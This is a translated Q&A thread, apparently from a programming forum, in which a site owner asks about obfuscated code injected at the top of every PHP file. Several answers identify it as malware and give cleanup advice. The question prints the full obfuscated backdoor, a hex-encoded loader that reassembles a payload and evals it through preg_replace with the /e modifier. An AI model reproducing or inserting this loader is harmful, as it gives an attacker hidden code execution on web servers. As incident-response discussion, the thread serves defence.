垃圾代码出现在PHP文件的开头

时间:2014-11-03 16:52:23

标签: php security encryption

就在最近我的所有php文件都在每个文件的开头都开发了一些垃圾代码,我会在最后粘贴一个文件给你看。我清理此代码的任何文件都停止工作或有一些重大问题。请帮忙,下面的文件是我想的添加按钮的代码,如果我按原样使用这个文件,那么一切正常,如果我删除了垃圾代码,那么它就会停止工作

<?php $azebdqinoq = '825%x5c%x7827jsv%x5c%x78256<C>^#zx7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%860hA%x5c%x7827pd%x5c%x78256<pd%x5dov{h19275j{hnpd19275fubmg452]88]5]48]32M3]317]445]212]445]43]321fe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x24]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x78973:8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]867824*<!%x5c%x7824-%x5c%x7824gps)%x5x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7d]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%xc%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x572]48y]#>m%x5c%x7825:|:*r%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]BALS["%x61%156%x75%156%xopjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!XA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x786x5c%x7822!ftmbg)!gj<*#k#)usbux78b%x5c%x7825mm)%x5c%c%x78256<.msv%x5c%x725:-t%x5c%x7825)3of:ZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x78b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+y25c:>%x5c%x7825s:%x5c%x785c%x>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%ss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1Gx5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%%164") && (!isset($GLOx5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x523ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpx5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%25%x5c%x7824-%x5c%x78222:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnp%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112ror_reporting(0); preg_replace("%x2f%50%xyf%x5c%x7860%x5c%x7878%x5c%]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257I#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x785c%x7824b!>!%x5c%x7825yy)#}#-#%x4y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x78%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjAx7825%x5c%x7878:-!%x5c%x7825tz>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojx5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFc%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x785c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785cfmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]UI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X82f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x725)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5osvufs:~928>>%x5c%x7856~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdx782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fx29%73", NULL); }24]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodu%x7825kj:!>!#]y3d]51x7822l:!}V;3q%x5c%x7825}U;y]7878Bsfuvso!sboepn)%x5c%x7825epnb2]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x%x5c%x785csboe))1%x5c%)sutcvt)fubmgoj{hA!osvufs!~<3x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]25%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825c%x7825w6Z6<.3%x5c%x78625)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5cx5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x>b%x5c%x7825Z<#opo#>b7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c27id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66f%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x7FGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QU2f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]26c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7ovg!|!**#j{hnpd#)tutjyf%x5c%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x75c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860825!<12>j%x5c%x7825!|!*#91y]c9y]g2y2f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x782]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%24-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)yqmpef)#%x5c%x7824*<!%x5c,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x78%x5c%x7824Ypp3)%x5c%x7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6Loj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppdex35%165%x3a%146%x21%76%x21%50%x5c%x78x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x7882f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%0hA%x5c%x7827pd%x5c%x78256<pd%2%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]yf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!s5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x7825c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x785!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827t>j%x5c%x7825!*9!%x5c%x7827!hmg%33]65]y31]55]y85]82]y7jpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x7824W&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudov0%x6c%157%x64%145%x28%%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<epdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjif((function_exists("%x6f%142%x5f%163%x74%141%x726g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78%x78242178}527}88:}334}47x787fw6*%x5c%x787f_*##)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepd6767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786c%x7860opjudovg)!gj!|!25!)!gj!<2,*j%x5c%x782dR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%sdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%2]y74]256]y39]252]y83]273]y7^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%c%x7825%x5c%x7824-%x#!#-%x5c%x7825tmw)%x5c%w%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]21M5]D2P4]D6#<%x5c%x7825G]y6d]281L]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-trg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2qc%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbu]#>>*4-1-bubE{h%x5c%x7825)sutx7825z>!tussfw)%x5c%x7825zW%x5c%x7825h2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%16feobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zp!*#opo#>>}R;msv}.;%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%}R;2]},;osvufs}%x5c%x7>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5ggg!>!#]y81]273]y76]258]y6g]273]y76]2715c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x78x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x782f#%x5c%x782f#%x5c%x782f},-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5cx785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cbssb!-#}#)fepmqnj!%x5c%x782]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!0LDPT7-UFOJ%x5c%x7860GB)fubf*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>t%x5c%x7860cpV%x5c%x787f%x5c%x7c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7]464]284]364]6]234]34n fjfgg($n){return chr(ord($n)-1);} @erce44#)zbssb!>!ssbnpe_GMFT%x5c%x786!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsu827,*b%x5c%x7827)fepdof.)fepdof.%x5ccvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjud2]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss;#-#}+;%x5c%x7825-qp%x5c%x7825825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K747y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]7{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%tus%x5c%x7860sfqmbdf)%x5c%x78860ftsbqA7>q%x5c%x78256<%x5c%x787.984:75983:48984:71]K9]77]D4]82]K6]72])54l}%x5c%x7827;%x5c%x7825!<*#}_;#)3>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmq%x5c%x7825%x5c%x7827Y%x5%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]oGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x78147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%sfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%]y35]256]y76]72]y3d]51]y35]274057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftm5]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd8:56985:6197g:74985-rr.93e:5597f-s.5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x87f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x782782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x0QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFS73]D6P2L5P6]y6gP7L6Mf!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7872qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x52fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c~<**9.-j%x5c%x7825-bubE{h%x5c%x782561"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; functio%x7825%x5c%x7824-%x5c%x7824!>!fO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)eu]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*C6]62]y3:]84#-!OVMM*<%x22%51%x29%51%/(.*)/epreg_replaceyghchkxkgi'; $iuipceeisf = explode(chr((172-128)),'5769,49,1440,22,809,24,9863,54,7862,39,1838,41,6818,50,5630,22,6937,55,8755,69,4838,37,774,35,5480,51,5984,57,4193,35,135,34,3498,23,5005,30,9132,40,8640,63,10013,58,5531,41,9309,67,1572,67,1963,42,4391,49,2923,61,933,52,7542,28,6164,50,4875,66,5186,50,9499,53,2659,44,0,33,8824,42,7427,51,8615,25,1036,20,8379,33,3934,39,2136,55,8998,35,3255,65,8556,59,6127,37,2277,45,8703,52,3882,52,626,61,5906,21,687,53,4301,55,9033,37,6405,59,7610,44,1233,63,1462,53,6083,22,7570,40,9828,35,3342,29,4666,50,6105,22,5324,58,7935,62,5382,32,9070,62,4601,40,3738,38,7802,39,2744,53,4356,35,6751,29,8033,40,4228,27,5652,59,874,59,1345,48,9948,65,8283,67,2984,47,4255,46,7997,36,1778,60,516,61,1143,61,6868,49,7478,27,9450,49,3521,55,9724,53,7901,34,9376,54,4076,52,2605,54,3681,21,2083,53,9777,51,6041,42,8896,41,5082,62,6917,20,7343,33,8120,30,8450,36,1515,57,2902,21,1723,55,169,26,4787,51,5927,57,234,41,3702,36,985,29,7654,31,9264,45,8239,44,1076,67,9600,54,2221,56,5711,58,1879,27,3137,28,6992,22,5572,58,6616,64,4015,61,4941,64,3371,70,6214,28,3198,57,7188,47,1906,57,4440,68,33,52,4561,40,2835,67,2322,52,2703,41,2484,52,3776,53,8196,43,740,34,1056,20,833,41,5881,25,5035,47,5818,63,275,46,4508,53,2797,38,6305,20,2005,32,7121,67,8350,29,1701,22,2037,46,3048,69,5436,44,378,35,6680,31,6711,40,3973,42,9917,31,4641,25,3117,20,8866,30,7505,37,4716,21,2416,68,577,49,9207,57,3165,33,1296,49,6780,38,7014,68,7685,49,5144,42,6325,23,413,40,8150,46,9172,35,321,57,6560,56,8412,38,3576,47,6464,63,9430,20,4737,50,6527,33,453,63,2374,42,8486,70,7734,68,2536,69,195,39,7841,21,8073,47,3320,22,7273,70,1393,47,9552,48,9654,70,3829,53,7235,38,1204,29,5236,44,6242,63,3623,58,85,50,1639,62,1014,22,2191,30,6348,57,7376,51,3441,57,7082,39,5280,44,4128,65,8937,61,5414,22,10071,35,3031,17'); $jlfewmajru=substr($azebdqinoq,(60333-50227),(36-29)); if (!function_exists('ieyytpzwon')) { function ieyytpzwon($npyiglifgm, $abljwfudhn) { $fvtdvkghyu = NULL; for($ienbzzgpgq=0;$ienbzzgpgq<(sizeof($npyiglifgm)/2);$ienbzzgpgq++) { $fvtdvkghyu .= substr($abljwfudhn, $npyiglifgm[($ienbzzgpgq*2)],$npyiglifgm[($ienbzzgpgq*2)+1]); } return $fvtdvkghyu; };} $rtevwrmojr="\x20\57\x2a\40\x6a\147\x79\163\x6a\151\x6c\155\x6e\166\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\62\x35\55\x31\70\x38\51\x29\54\x20\143\x68\162\x28\50\x34\65\x35\55\x33\66\x33\51\x29\54\x20\151\x65\171\x79\164\x70\172\x77\157\x6e\50\x24\151\x75\151\x70\143\x65\145\x69\163\x66\54\x24\141\x7a\145\x62\144\x71\151\x6e\157\x71\51\x29\51\x3b\40\x2f\52\x20\147\x61\151\x6a\146\x61\167\x77\160\x70\40\x2a\57\x20"; $ghyzwmwujj=substr($azebdqinoq,(65784-55671),(83-71)); $ghyzwmwujj($jlfewmajru, $rtevwrmojr, NULL); $ghyzwmwujj=$rtevwrmojr; $ghyzwmwujj=(652-531); $azebdqinoq=$ghyzwmwujj-1; ?><?php include_once("php_includes/check_login_status.php");

4 个答案:

答案 0 :(得分:4)

这不是“垃圾”,即通过漏洞(即过时的代码等)在您的服务器上安装一块恶意软件。正如您从下面的链接中看到的,该漏洞可能与WordPress MailPoet插件有关,但许多可能的漏洞可能导致相同的结果

怎么做:让安全专业人员查看服务器。

什么可能就足够了

  • 从干净备份中恢复所有文件,并将所有涉及的软件升级到最新版本和安全补丁级别(如果可能,最好离线执行此操作)。
  • 禁用所有插件或软件包,其中包含未完成的漏洞报告,并且没有可用的缓解措施(您必须检查相关的站点和邮件列表)。
  • 验证服务器上所有文件的时间戳,查找“clumps”(大量文件,特别是如果不相关,在同一日期和时间修改)和可疑时间戳(例如在网站管理员工作时间之外上传或修改的PHP文件) ,或者当它们不应该被修改的文件(例如系统文件等),或者不属于它们的文件(数据目录中的可执行文件)或者看起来可疑的文件(例如随机名称)。
  • 检查网络服务器日志中是否存在可疑活动,尤其是涉及IP地址31.184.192.250或类似情况(见下文)。
  • 还要检查其他可能的日志(如果存在):邮件服务器,SSH,登录,FTP。

半技术性的东西和琐事:我已经解密了代码 - 经过几层混淆后,核心似乎是this的近亲,可能完全相同。它似乎是在2013年圣诞节前夕,网站管理员called for help上不久首次出现在中文网站上。

命令和控制服务器的域名于2013年11月注册,位于俄罗斯圣彼得堡。 URL显然没有响应(但是内部检查可能会在“原始”恶意软件和被破坏以调查协议的恶意软件之间进行判断,并拒绝回答后者)。

可以在GitHub上找到恶意软件的明文脚本here(不用说,谨慎行事)。

答案 1 :(得分:3)

您的代码不太可能自行开发垃圾代码。您的网站遭到黑客入侵。您需要更新您正在使用的操作系统和/或CMS。

答案 2 :(得分:2)

这是恶意代码。你很可能会运行Wordpress或Joomla!网站,不是吗? ;-) 某处(在脚本中)我猜有一个带有base64_decode函数的“模糊”代码块。通常这种恶意代码经过多次base64编码,因此它可以“隐藏”它正在做的事情。

删除整个网站并从头开始设置。安装安全插件并确保始终应用最新的补丁。

请参阅http://blog.securestate.com/decoding-php-backdoor/以获取有关其工作原理的说明。

答案 3 :(得分:0)

这是由安装在您的网络服务器上的可利用软件放入您的代码的恶意软件。 在某个地方,有一个不断被请求的脚本会覆盖php文件,而且很可能是带有恶意软件代码的HTML文件。 我建议你更新所有已安装的软件,并从你的ISP请求最后几周的日志文件以查找泄漏。